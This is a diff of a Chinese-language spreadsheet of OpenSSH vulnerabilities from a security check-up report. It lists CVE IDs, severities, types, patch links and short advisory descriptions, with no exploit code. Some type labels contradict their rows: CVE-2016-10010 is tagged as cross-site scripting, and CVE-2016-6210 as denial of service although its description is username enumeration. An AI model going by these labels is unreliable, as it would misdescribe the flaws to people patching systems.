-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。scp Client是其中的一个SCP客户端。OpenSSH 7.9版本中的scp客户端的scp.c文件存在安全漏洞。远程攻击者可借助.文件名或空文件名利用该漏洞造成SSH服务器绕过访问限制。</t>
+          <t>从OpenSSH 到 9.6，当使用常见类型的 DRAM 时，可能会允许行锤攻击（用于绕过身份验证），因为 mm_answer_authpassword 中已验证的整数值无法抵抗单个位的翻转。注意：这适用于攻击者-受害者共置的某种威胁模型，其中攻击者拥有用户权限。</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -3598,7 +3592,7 @@
       </c>
       <c r="J28" t="inlineStr">
         <is>
-          <t>CVE-2018-20685</t>
+          <t>CVE-2023-51767</t>
         </is>
       </c>
       <c r="K28" t="inlineStr">
@@ -3668,7 +3662,7 @@
     <row r="29">
       <c r="A29" t="inlineStr">
         <is>
-          <t>OpenSSH身份验证绕过漏洞(CVE-2023-51767)</t>
+          <t>OpenSSH xauth命令注入漏洞(CVE-2016-3115)</t>
         </is>
       </c>
       <c r="B29" t="inlineStr">
@@ -3678,22 +3672,23 @@
       </c>
       <c r="C29" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D29" t="inlineStr">
         <is>
-          <t>绕过认证</t>
+          <t>命令执行</t>
         </is>
       </c>
       <c r="E29" t="inlineStr">
         <is>
-          <t>官方已发布新版本修复该漏洞，请根据具体发行版将openssh更新到最新版本。</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/x11fwd.adv</t>
         </is>
       </c>
       <c r="F29" t="inlineStr">
         <is>
-          <t>从OpenSSH 到 9.6，当使用常见类型的 DRAM 时，可能会允许行锤攻击（用于绕过身份验证），因为 mm_answer_authpassword 中已验证的整数值无法抵抗单个位的翻转。注意：这适用于攻击者-受害者共置的某种威胁模型，其中攻击者拥有用户权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.2p1及之前版本的sshd中的session.c文件中存在CRLF注入漏洞。远程攻击者可借助特制的X11转发数据利用该漏洞绕过既定的shell-command限制。</t>
         </is>
       </c>
       <c r="G29" t="inlineStr">
@@ -3713,7 +3708,7 @@
       </c>
       <c r="J29" t="inlineStr">
         <is>
-          <t>CVE-2023-51767</t>
+          <t>CVE-2016-3115</t>
         </is>
       </c>
       <c r="K29" t="inlineStr">
@@ -3783,7 +3778,7 @@
     <row r="30">
       <c r="A30" t="inlineStr">
         <is>
-          <t>OpenSSH x11_open_helper()函数安全限制绕过漏洞(CVE-2015-5352)</t>
+          <t>OpenSSH sshd monitor.c文件权限许可和访问控制漏洞(CVE-2015-6564)</t>
         </is>
       </c>
       <c r="B30" t="inlineStr">
@@ -3798,18 +3793,17 @@
       </c>
       <c r="D30" t="inlineStr">
         <is>
-          <t>防御绕过</t>
+          <t>访问控制错误</t>
         </is>
       </c>
       <c r="E30" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/release-6.9</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F30" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 6.9之前版本的ssh中的channels.c文件中的‘x11_open_helper’函数存在安全漏洞，该漏洞源于程序禁用ForwardX11Trusted模式时，没有检查X连接的refusal deadline。远程攻击者可借助特制的连接利用该漏洞绕过既定的访问限制。</t>
+          <t>基于non-OpenBSD平台的OpenSSH 7.0之前版本的sshd中的monitor.c文件中的‘mm_answer_pam_free_ctx’函数存在释放后重用漏洞。本地攻击者可通过控制sshd uid发送错误的MONITOR_REQ_PAM_FREE_CTX请求利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G30" t="inlineStr">
@@ -3829,7 +3823,7 @@
       </c>
       <c r="J30" t="inlineStr">
         <is>
-          <t>CVE-2015-5352</t>
+          <t>CVE-2015-6564</t>
         </is>
       </c>
       <c r="K30" t="inlineStr">
@@ -3899,28 +3893,33 @@
     <row r="31">
       <c r="A31" t="inlineStr">
         <is>
-          <t>openssh 安全漏洞 (CVE-2023-51384)</t>
+          <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
         </is>
       </c>
       <c r="B31" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D31" t="inlineStr"/>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr">
+        <is>
+          <t>授权问题</t>
+        </is>
+      </c>
       <c r="E31" t="inlineStr">
         <is>
-          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://www.openssh.com/security.html</t>
         </is>
       </c>
       <c r="F31" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于当在添加PKCS11托管私钥的过程中指定目标约束时，这些约束仅应用于第一个密钥。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 
+OpenSSH 8.9 之前的版本中存在安全漏洞。该漏洞源于客户端使用带代理转发但没有 -oLogLevel=verbose 的公钥身份验证。</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -3940,7 +3939,7 @@
       </c>
       <c r="J31" t="inlineStr">
         <is>
-          <t>CVE-2023-51384</t>
+          <t>CVE-2021-36368</t>
         </is>
       </c>
       <c r="K31" t="inlineStr">
@@ -4010,7 +4009,7 @@
     <row r="32">
       <c r="A32" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2016-0777)</t>
+          <t>OpenSSH信息泄露漏洞(CVE-2020-14145)</t>
         </is>
       </c>
       <c r="B32" t="inlineStr">
@@ -4030,12 +4029,13 @@
       </c>
       <c r="E32" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
+https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F32" t="inlineStr">
         <is>
-          <t>远程攻击者可通过请求传输整个缓冲区利用该漏洞获取进程内存中的敏感信息。</t>
+          <t>OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 5.7版本至8.4版本的客户端中存在信息泄露漏洞。攻击者可利用该漏洞获取信息。</t>
         </is>
       </c>
       <c r="G32" t="inlineStr">
@@ -4055,7 +4055,7 @@
       </c>
       <c r="J32" t="inlineStr">
         <is>
-          <t>CVE-2016-0777</t>
+          <t>CVE-2020-14145</t>
         </is>
       </c>
       <c r="K32" t="inlineStr">
@@ -4125,7 +4125,7 @@
     <row r="33">
       <c r="A33" t="inlineStr">
         <is>
-          <t>OpenSSH 本地信息泄露漏洞(CVE-2016-10011)</t>
+          <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
         </is>
       </c>
       <c r="B33" t="inlineStr">
@@ -4135,22 +4135,22 @@
       </c>
       <c r="C33" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D33" t="inlineStr">
         <is>
-          <t>权限提升</t>
+          <t>跨站脚本攻击（XSS）</t>
         </is>
       </c>
       <c r="E33" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.4</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F33" t="inlineStr">
         <is>
-          <t>OpenSSH 7.4之前的版本中的sshd的authfile.c文件中存在安全漏洞。本地攻击者可通过访问privilege-separated子进程利用该漏洞获取敏感的私钥信息。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd存在安全漏洞。本地攻击者可利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G33" t="inlineStr">
@@ -4170,7 +4170,7 @@
       </c>
       <c r="J33" t="inlineStr">
         <is>
-          <t>CVE-2016-10011</t>
+          <t>CVE-2016-10010</t>
         </is>
       </c>
       <c r="K33" t="inlineStr">
@@ -4240,28 +4240,32 @@
     <row r="34">
       <c r="A34" t="inlineStr">
         <is>
-          <t>OpenSSH sshd monitor组件欺骗漏洞(CVE-2015-6563)</t>
+          <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
         </is>
       </c>
       <c r="B34" t="inlineStr">
         <is>
-          <t>建议修复</t>
+          <t>尽快修复</t>
         </is>
       </c>
       <c r="C34" t="inlineStr">
         <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D34" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t>拒绝服务</t>
+        </is>
+      </c>
       <c r="E34" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.0</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3</t>
         </is>
       </c>
       <c r="F34" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）on non-OpenBSD platforms是OpenBSD计划组所维护的一套运行于非OpenBSD（基于BSD的UNIX实现）平台且用于安全访问远程计算机的连接工具。基于non-OpenBSD平台的OpenSSH 6.9及之前版本的sshd中的monitor组件中存在安全漏洞，该漏洞源于程序错误的接收MONITOR_REQ_PAM_INIT_CTX请求中的外部用户名数据。本地攻击者可通过SSH登录访问并控制sshd uid向MONITOR_REQ_PWNAM发送特制的请求，利用该漏洞实施伪造攻击。</t>
+          <t>远程主机上运行的 OpenSSH 版本早于 7.3存在一个缺陷,造成此缺陷的原因是对于无效用户而言,程序针对密码过长的验证请求返回的响应时间比针对有效用户返回的响应时间短。这可能允许远程攻击者发动时序攻击并枚举有效用户名。</t>
         </is>
       </c>
       <c r="G34" t="inlineStr">
@@ -4281,7 +4285,7 @@
       </c>
       <c r="J34" t="inlineStr">
         <is>
-          <t>CVE-2015-6563</t>
+          <t>CVE-2016-6210</t>
         </is>
       </c>
       <c r="K34" t="inlineStr">
@@ -4351,32 +4355,28 @@
     <row r="35">
       <c r="A35" t="inlineStr">
         <is>
-          <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
+          <t>OpenSSH sshd monitor组件欺骗漏洞(CVE-2015-6563)</t>
         </is>
       </c>
       <c r="B35" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C35" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D35" t="inlineStr">
-        <is>
-          <t>权限提升</t>
-        </is>
-      </c>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr"/>
       <c r="E35" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.0</t>
         </is>
       </c>
       <c r="F35" t="inlineStr">
         <is>
-          <t>OpenSSH 7.2p2及之前版本的sshd中的session.c文件中的‘do_setup_env’函数存在安全漏洞。当程序启用UseLogin功能并且PAM被配置成读取用户主目录中的.pam_environment文件时，本地攻击者可借助/bin/login程序的特制的环境变量利用该漏洞获取权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）on non-OpenBSD platforms是OpenBSD计划组所维护的一套运行于非OpenBSD（基于BSD的UNIX实现）平台且用于安全访问远程计算机的连接工具。基于non-OpenBSD平台的OpenSSH 6.9及之前版本的sshd中的monitor组件中存在安全漏洞，该漏洞源于程序错误的接收MONITOR_REQ_PAM_INIT_CTX请求中的外部用户名数据。本地攻击者可通过SSH登录访问并控制sshd uid向MONITOR_REQ_PWNAM发送特制的请求，利用该漏洞实施伪造攻击。</t>
         </is>
       </c>
       <c r="G35" t="inlineStr">
@@ -4396,7 +4396,7 @@
       </c>
       <c r="J35" t="inlineStr">
         <is>
-          <t>CVE-2015-8325</t>
+          <t>CVE-2015-6563</t>
         </is>
       </c>
       <c r="K35" t="inlineStr">
@@ -4466,7 +4466,7 @@
     <row r="36">
       <c r="A36" t="inlineStr">
         <is>
-          <t>OpenSSH SSH守护进程安全漏洞(CVE-2016-6210)</t>
+          <t>OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)</t>
         </is>
       </c>
       <c r="B36" t="inlineStr">
@@ -4476,22 +4476,22 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D36" t="inlineStr">
         <is>
-          <t>拒绝服务</t>
+          <t>权限提升</t>
         </is>
       </c>
       <c r="E36" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.3</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F36" t="inlineStr">
         <is>
-          <t>远程主机上运行的 OpenSSH 版本早于 7.3存在一个缺陷,造成此缺陷的原因是对于无效用户而言,程序针对密码过长的验证请求返回的响应时间比针对有效用户返回的响应时间短。这可能允许远程攻击者发动时序攻击并枚举有效用户名。</t>
+          <t>OpenSSH 7.2p2及之前版本的sshd中的session.c文件中的‘do_setup_env’函数存在安全漏洞。当程序启用UseLogin功能并且PAM被配置成读取用户主目录中的.pam_environment文件时，本地攻击者可借助/bin/login程序的特制的环境变量利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -4511,7 +4511,7 @@
       </c>
       <c r="J36" t="inlineStr">
         <is>
-          <t>CVE-2016-6210</t>
+          <t>CVE-2015-8325</t>
         </is>
       </c>
       <c r="K36" t="inlineStr">
@@ -4581,7 +4581,7 @@
     <row r="37">
       <c r="A37" t="inlineStr">
         <is>
-          <t>OpenSSH 远程权限提升漏洞(CVE-2016-10010)</t>
+          <t>Openssh 安全限制绕过漏洞(CVE-2016-10012)</t>
         </is>
       </c>
       <c r="B37" t="inlineStr">
@@ -4596,17 +4596,17 @@
       </c>
       <c r="D37" t="inlineStr">
         <is>
-          <t>跨站脚本攻击（XSS）</t>
+          <t>代码执行</t>
         </is>
       </c>
       <c r="E37" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.4</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9</t>
         </is>
       </c>
       <c r="F37" t="inlineStr">
         <is>
-          <t>OpenSSH 7.4之前的版本中的sshd存在安全漏洞。本地攻击者可利用该漏洞获取权限。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd的共享内存管理器存在安全漏洞。本地攻击者可通过访问沙箱privilege-separation进程利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G37" t="inlineStr">
@@ -4626,7 +4626,7 @@
       </c>
       <c r="J37" t="inlineStr">
         <is>
-          <t>CVE-2016-10010</t>
+          <t>CVE-2016-10012</t>
         </is>
       </c>
       <c r="K37" t="inlineStr">
@@ -4696,7 +4696,7 @@
     <row r="38">
       <c r="A38" t="inlineStr">
         <is>
-          <t>Openssh 安全限制绕过漏洞(CVE-2016-10012)</t>
+          <t>OpenSSH 本地信息泄露漏洞(CVE-2016-10011)</t>
         </is>
       </c>
       <c r="B38" t="inlineStr">
@@ -4706,22 +4706,22 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D38" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>权限提升</t>
         </is>
       </c>
       <c r="E38" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.openssh.com/txt/release-7.4</t>
         </is>
       </c>
       <c r="F38" t="inlineStr">
         <is>
-          <t>OpenSSH 7.4之前的版本中的sshd的共享内存管理器存在安全漏洞。本地攻击者可通过访问沙箱privilege-separation进程利用该漏洞获取权限。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd的authfile.c文件中存在安全漏洞。本地攻击者可通过访问privilege-separated子进程利用该漏洞获取敏感的私钥信息。</t>
         </is>
       </c>
       <c r="G38" t="inlineStr">
@@ -4741,7 +4741,7 @@
       </c>
       <c r="J38" t="inlineStr">
         <is>
-          <t>CVE-2016-10012</t>
+          <t>CVE-2016-10011</t>
         </is>
       </c>
       <c r="K38" t="inlineStr">

--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -900,7 +900,7 @@
     <row r="5">
       <c r="A5" t="inlineStr">
         <is>
-          <t>OpenSSH 拒绝服务漏洞(CVE-2016-1907)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-0778)</t>
         </is>
       </c>
       <c r="B5" t="inlineStr">
@@ -910,7 +910,7 @@
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
@@ -920,13 +920,12 @@
       </c>
       <c r="E5" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F5" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.1p2之前版本的packet.c文件中的‘ssh_packet_read_poll2’函数中存在安全漏洞。远程攻击者可借助特制的网络流量利用该漏洞造成拒绝服务（越边界读取和应用程序崩溃）。</t>
+          <t>OpenSSH的客户端中的roaming_common.c文件中的‘roaming_read’和‘roaming_write’函数中存在安全漏洞，该漏洞源于程序启用特定的代理和转发选项时，没有正确保持连接文件描述符。远程攻击者可通过发送多个转发请求利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）</t>
         </is>
       </c>
       <c r="G5" t="inlineStr">
@@ -946,7 +945,7 @@
       </c>
       <c r="J5" t="inlineStr">
         <is>
-          <t>CVE-2016-1907</t>
+          <t>CVE-2016-0778</t>
         </is>
       </c>
       <c r="K5" t="inlineStr">
@@ -1016,7 +1015,7 @@
     <row r="6">
       <c r="A6" t="inlineStr">
         <is>
-          <t>OpenSSH 竞争条件问题漏洞(CVE-2018-15473)</t>
+          <t>OpenSSH 安全漏洞(CVE-2017-15906)</t>
         </is>
       </c>
       <c r="B6" t="inlineStr">
@@ -1029,20 +1028,15 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D6" t="inlineStr">
-        <is>
-          <t>条件竞争</t>
-        </is>
-      </c>
+      <c r="D6" t="inlineStr"/>
       <c r="E6" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssh.com/txt/release-7.6</t>
         </is>
       </c>
       <c r="F6" t="inlineStr">
         <is>
-          <t>OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中，并发代码需要互斥地访问共享资源时，对于并发访问的处理不当。</t>
+          <t>OpenSSH 7.6之前的版本中的sftp-server.c文件的‘process_open’函数存在安全漏洞，该漏洞源于程序在只读模式下没有正确的阻止写入操作。攻击者可利用该漏洞创建长度为零的文件。</t>
         </is>
       </c>
       <c r="G6" t="inlineStr">
@@ -1062,7 +1056,7 @@
       </c>
       <c r="J6" t="inlineStr">
         <is>
-          <t>CVE-2018-15473</t>
+          <t>CVE-2017-15906</t>
         </is>
       </c>
       <c r="K6" t="inlineStr">
@@ -1132,7 +1126,7 @@
     <row r="7">
       <c r="A7" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2017-15906)</t>
+          <t>OpenSSH 竞争条件问题漏洞(CVE-2018-15473)</t>
         </is>
       </c>
       <c r="B7" t="inlineStr">
@@ -1145,15 +1139,20 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D7" t="inlineStr"/>
+      <c r="D7" t="inlineStr">
+        <is>
+          <t>条件竞争</t>
+        </is>
+      </c>
       <c r="E7" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssh.com/txt/release-7.6</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0</t>
         </is>
       </c>
       <c r="F7" t="inlineStr">
         <is>
-          <t>OpenSSH 7.6之前的版本中的sftp-server.c文件的‘process_open’函数存在安全漏洞，该漏洞源于程序在只读模式下没有正确的阻止写入操作。攻击者可利用该漏洞创建长度为零的文件。</t>
+          <t>OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中，并发代码需要互斥地访问共享资源时，对于并发访问的处理不当。</t>
         </is>
       </c>
       <c r="G7" t="inlineStr">
@@ -1173,7 +1172,7 @@
       </c>
       <c r="J7" t="inlineStr">
         <is>
-          <t>CVE-2017-15906</t>
+          <t>CVE-2018-15473</t>
         </is>
       </c>
       <c r="K7" t="inlineStr">
@@ -1243,7 +1242,7 @@
     <row r="8">
       <c r="A8" t="inlineStr">
         <is>
-          <t>OpenSSH 拒绝服务漏洞(CVE-2016-0778)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-1907)</t>
         </is>
       </c>
       <c r="B8" t="inlineStr">
@@ -1253,7 +1252,7 @@
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
@@ -1263,12 +1262,13 @@
       </c>
       <c r="E8" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F8" t="inlineStr">
         <is>
-          <t>OpenSSH的客户端中的roaming_common.c文件中的‘roaming_read’和‘roaming_write’函数中存在安全漏洞，该漏洞源于程序启用特定的代理和转发选项时，没有正确保持连接文件描述符。远程攻击者可通过发送多个转发请求利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.1p2之前版本的packet.c文件中的‘ssh_packet_read_poll2’函数中存在安全漏洞。远程攻击者可借助特制的网络流量利用该漏洞造成拒绝服务（越边界读取和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G8" t="inlineStr">
@@ -1288,7 +1288,7 @@
       </c>
       <c r="J8" t="inlineStr">
         <is>
-          <t>CVE-2016-0778</t>
+          <t>CVE-2016-1907</t>
         </is>
       </c>
       <c r="K8" t="inlineStr">
@@ -1473,7 +1473,7 @@
     <row r="10">
       <c r="A10" t="inlineStr">
         <is>
-          <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
+          <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
         </is>
       </c>
       <c r="B10" t="inlineStr">
@@ -1486,16 +1486,20 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D10" t="inlineStr"/>
+      <c r="D10" t="inlineStr">
+        <is>
+          <t>拒绝服务</t>
+        </is>
+      </c>
       <c r="E10" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
         </is>
       </c>
       <c r="F10" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH before 8.5 存在安全漏洞，攻击者可利用该漏洞在遗留操作系统上不受约束的代理套接字访问。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.3之前的版本中的sshd中的auth-passwd.c文件中的‘auth_password’函数存在输入验证错误漏洞，该漏洞源于程序没有在密码验证中限制密码长度。远程攻击者可借助长的字符串利用该漏洞造成拒绝服务(CPU消耗)。</t>
         </is>
       </c>
       <c r="G10" t="inlineStr">
@@ -1515,7 +1519,7 @@
       </c>
       <c r="J10" t="inlineStr">
         <is>
-          <t>CVE-2021-28041</t>
+          <t>CVE-2016-6515</t>
         </is>
       </c>
       <c r="K10" t="inlineStr">
@@ -1585,7 +1589,7 @@
     <row r="11">
       <c r="A11" t="inlineStr">
         <is>
-          <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
         </is>
       </c>
       <c r="B11" t="inlineStr">
@@ -1598,20 +1602,16 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D11" t="inlineStr">
-        <is>
-          <t>拒绝服务</t>
-        </is>
-      </c>
+      <c r="D11" t="inlineStr"/>
       <c r="E11" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
         </is>
       </c>
       <c r="F11" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.3之前的版本中的sshd中的auth-passwd.c文件中的‘auth_password’函数存在输入验证错误漏洞，该漏洞源于程序没有在密码验证中限制密码长度。远程攻击者可借助长的字符串利用该漏洞造成拒绝服务(CPU消耗)。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH before 8.5 存在安全漏洞，攻击者可利用该漏洞在遗留操作系统上不受约束的代理套接字访问。</t>
         </is>
       </c>
       <c r="G11" t="inlineStr">
@@ -1631,7 +1631,7 @@
       </c>
       <c r="J11" t="inlineStr">
         <is>
-          <t>CVE-2016-6515</t>
+          <t>CVE-2021-28041</t>
         </is>
       </c>
       <c r="K11" t="inlineStr">
@@ -1701,7 +1701,7 @@
     <row r="12">
       <c r="A12" t="inlineStr">
         <is>
-          <t>OpenSSH Maxauthtries限制绕过漏洞(CVE-2015-5600)</t>
+          <t>OpenSSH 信息泄漏漏洞(CVE-2018-15919)</t>
         </is>
       </c>
       <c r="B12" t="inlineStr">
@@ -1711,22 +1711,22 @@
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D12" t="inlineStr">
         <is>
-          <t>越权访问</t>
+          <t>信息泄露</t>
         </is>
       </c>
